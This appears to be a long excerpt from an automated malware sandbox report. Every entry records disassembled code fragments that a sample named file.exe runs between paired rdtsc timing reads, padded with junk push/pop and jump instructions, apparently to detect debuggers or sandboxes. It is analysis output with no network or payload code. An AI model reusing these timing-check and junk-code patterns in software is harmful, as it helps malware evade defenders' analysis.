                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104EF3C second address: 104EF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104F0C7 second address: 104F0CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104F0CB second address: 104F0CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104F0CF second address: 104F0DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F67208644C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104F3C9 second address: 104F3CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104F3CD second address: 104F3D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F67208644C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104F3D7 second address: 104F3DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104F3DB second address: 104F3E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104F6B8 second address: 104F70D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6720533106h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jmp 00007F672053310Eh 0x00000014 pushad 0x00000015 jmp 00007F6720533114h 0x0000001a jmp 00007F6720533111h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 jnp 00007F6720533106h 0x00000027 popad 0x00000028 push ebx 0x00000029 jp 00007F6720533106h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104F9B4 second address: 104F9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104F9BC second address: 104F9C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104F9C3 second address: 104F9FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop ecx 0x0000000f ja 00007F67208644D8h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104FD0B second address: 104FD15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F6720533106h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104FD15 second address: 104FD39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644D3h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jp 00007F67208644C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 104FFEE second address: 1050011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jmp 00007F6720533116h 0x0000000b jo 00007F6720533106h 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1050011 second address: 105001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007F67208644C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1050595 second address: 10505B6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6720533117h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1050887 second address: 105088D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105088D second address: 1050894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1050894 second address: 105089C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105089C second address: 10508A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1050B7C second address: 1050B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1050B82 second address: 1050B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10543A0 second address: 10543A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10543A4 second address: 10543B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F672053310Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105453E second address: 1054542 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1054843 second address: 105484F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F672053310Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105A696 second address: 105A69A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105A69A second address: 105A6A7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6720533106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1060441 second address: 1060451 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10605A2 second address: 10605A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10605A7 second address: 10605AC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10605AC second address: 10605B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10605B2 second address: 10605BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106091E second address: 1060932 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6720533106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jnp 00007F672053311Ch 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1060932 second address: 1060938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1060A9F second address: 1060AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6720533106h 0x0000000a jl 00007F6720533106h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1060D2C second address: 1060D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1060D32 second address: 1060D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6720533106h 0x0000000a popad 0x0000000b pushad 0x0000000c jnp 00007F6720533106h 0x00000012 jo 00007F6720533106h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1060EAA second address: 1060EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061590 second address: 1061596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061596 second address: 10615C1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F67208644D3h 0x0000000f jmp 00007F67208644CEh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10615C1 second address: 10615C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10615C5 second address: 10615DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F67208644CDh 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105FB91 second address: 105FBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6720533106h 0x0000000a pop esi 0x0000000b push ebx 0x0000000c jmp 00007F6720533114h 0x00000011 push esi 0x00000012 pop esi 0x00000013 pop ebx 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007F6720533110h 0x0000001b jmp 00007F672053310Fh 0x00000020 push eax 0x00000021 push edx 0x00000022 push ecx 0x00000023 pop ecx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105FBD9 second address: 105FBFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jnl 00007F67208644C6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106A1C0 second address: 106A1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6720533106h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10763E9 second address: 10763EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10763EF second address: 1076415 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533119h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jnl 00007F672053310Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1076415 second address: 107641E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107641E second address: 1076424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAF905 second address: FAF921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F67208644D2h 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1075E4A second address: 1075E4F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107BE1E second address: 107BE22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107BE22 second address: 107BE37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533111h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107BE37 second address: 107BE41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107BFF1 second address: 107BFFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F6720533106h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1083EC5 second address: 1083ED0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108ADB5 second address: 108ADBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108ADBF second address: 108ADC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D133 second address: 108D137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D137 second address: 108D13B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108D13B second address: 108D146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1091F20 second address: 1091F24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10921E9 second address: 10921EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10921EF second address: 10921F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1092799 second address: 10927CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F6720533110h 0x0000000c ja 00007F6720533106h 0x00000012 pop ecx 0x00000013 jmp 00007F6720533110h 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10927CC second address: 10927DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F67208644C6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10933CA second address: 10933E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6720533118h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1097C95 second address: 1097C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1097C9D second address: 1097CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A745E second address: 10A747A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F67208644D6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A72B9 second address: 10A72C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F672053310Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B32BE second address: 10B32C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B32C3 second address: 10B3320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6720533118h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F6720533114h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F672053310Ch 0x0000001c jmp 00007F6720533118h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5AAA second address: 10B5AB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5AB2 second address: 10B5AD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6720533113h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B5AD3 second address: 10B5AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C62B5 second address: 10C62CF instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6720533106h 0x00000008 jmp 00007F672053310Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C62CF second address: 10C62D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C62D5 second address: 10C6300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6720533106h 0x0000000a jmp 00007F672053310Ch 0x0000000f popad 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6720533111h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C6300 second address: 10C630B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F67208644C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C630B second address: 10C6311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C540E second address: 10C5417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C556B second address: 10C55CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F6720533118h 0x0000000b jmp 00007F6720533113h 0x00000010 push edx 0x00000011 pop edx 0x00000012 jng 00007F6720533106h 0x00000018 popad 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d pushad 0x0000001e popad 0x0000001f pop ecx 0x00000020 jnp 00007F672053311Eh 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C55CA second address: 10C55D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C55D0 second address: 10C55D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C55D4 second address: 10C55D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C55D8 second address: 10C55DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5751 second address: 10C5757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5757 second address: 10C575B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C575B second address: 10C5764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5B0E second address: 10C5B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5B14 second address: 10C5B1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5B1A second address: 10C5B1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C5C69 second address: 10C5C7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67208644CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C7A56 second address: 10C7A5C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA5C6 second address: 10CA5D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA5D0 second address: 10CA5F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F6720533116h 0x00000010 jmp 00007F6720533110h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA5F0 second address: 10CA647 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F67208644CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jl 00007F67208644CCh 0x00000011 sub dword ptr [ebp+122D2F87h], ebx 0x00000017 push 00000004h 0x00000019 call 00007F67208644D1h 0x0000001e sbb dh, FFFFFF92h 0x00000021 pop edx 0x00000022 call 00007F67208644C9h 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F67208644D7h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10CA647 second address: 10CA67D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F672053310Ch 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007F672053310Dh 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F672053310Bh 0x00000021 rdtsc
